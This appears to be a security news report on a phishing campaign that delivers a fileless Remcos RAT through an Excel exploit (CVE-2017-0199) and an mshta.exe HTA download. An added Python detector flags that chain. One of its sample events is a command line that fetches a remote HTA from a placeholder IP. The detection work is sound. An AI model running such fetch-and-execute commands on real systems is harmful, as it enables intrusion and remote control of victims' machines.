Remcos RAT phishing attack abuses MS Excel bug

Researchers have uncovered a sophisticated phishing campaign deploying a fileless variant of the Remcos Remote Access Trojan (RAT), a commercial malware exploited by threat actors to control victims' computers and siphon sensitive information.

The attack, discovered by Fortinet's FortiGuard Labs, starts with a phishing email masquerading as a purchase order, tricking recipients into opening a Microsoft Excel attachment. The attachment exploits CVE-2017-0199, a known remote code execution vulnerability in Microsoft Office, to trigger the infection process.

Once activated, the compromised Excel document initiates a download of an HTML Application (HTA) file from an external server. Launched through the legitimate Windows utility mshta.exe, the HTA file starts a multi-stage deobfuscation process that passes through JavaScript, Visual Basic Script, and PowerShell.

The campaign incorporates complex anti-analysis and anti-debugging tactics. The payload does not store Remcos RAT on disk but directly injects it into the computer’s memory.
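A detection-side illustration, added here and not part of the original report: a small Python check over constructed process-creation events that flags the two observable steps of the chain described above, an Office application spawning mshta.exe and mshta.exe being launched with a remote URL. The event field names, the sample paths and the IP address are assumptions of this example, not Fortinet's telemetry.

```python
import re

# Constructed sample process-creation events (not real telemetry); the field
# names loosely follow Sysmon Event ID 1 and are an assumption of this example.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "http://192.0.2.10/stage.hta"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Users\u\AppData\Local\Temp\setup.hta"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

OFFICE_PROCESSES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lowercase file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the detection labels that apply to one process-creation event."""
    labels = []
    if basename(event["image"]) != "mshta.exe":
        return labels
    # An Office application has no routine reason to spawn mshta.exe; this is
    # the Excel -> HTA hand-off the report describes.
    if basename(event["parent_image"]) in OFFICE_PROCESSES:
        labels.append("office_spawned_mshta")
    # mshta.exe pulling its HTA from a remote URL is the download stage.
    if URL_RE.search(event["command_line"]):
        labels.append("mshta_remote_url")
    return labels


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, labels) for every event that triggers a detection."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := classify(ev))]


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(labels)}")
```

The parent-process relationship is the durable signal here: the download URL changes between campaigns, while Excel spawning mshta.exe does not.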

Once active, Remcos RAT can collect system metadata, execute commands, harvest files, and manipulate Windows services and the registry. Additionally, it allows attackers to capture clipboard data, alter desktop settings, access the device’s camera and microphone, record the screen, disable input devices, and deploy more malware, posing a severe security threat.

Last week, reports emerged that malicious actors started misusing DocuSign’s Envelopes API to distribute fraudulent invoices that mimic well-known brands, including Norton and PayPal.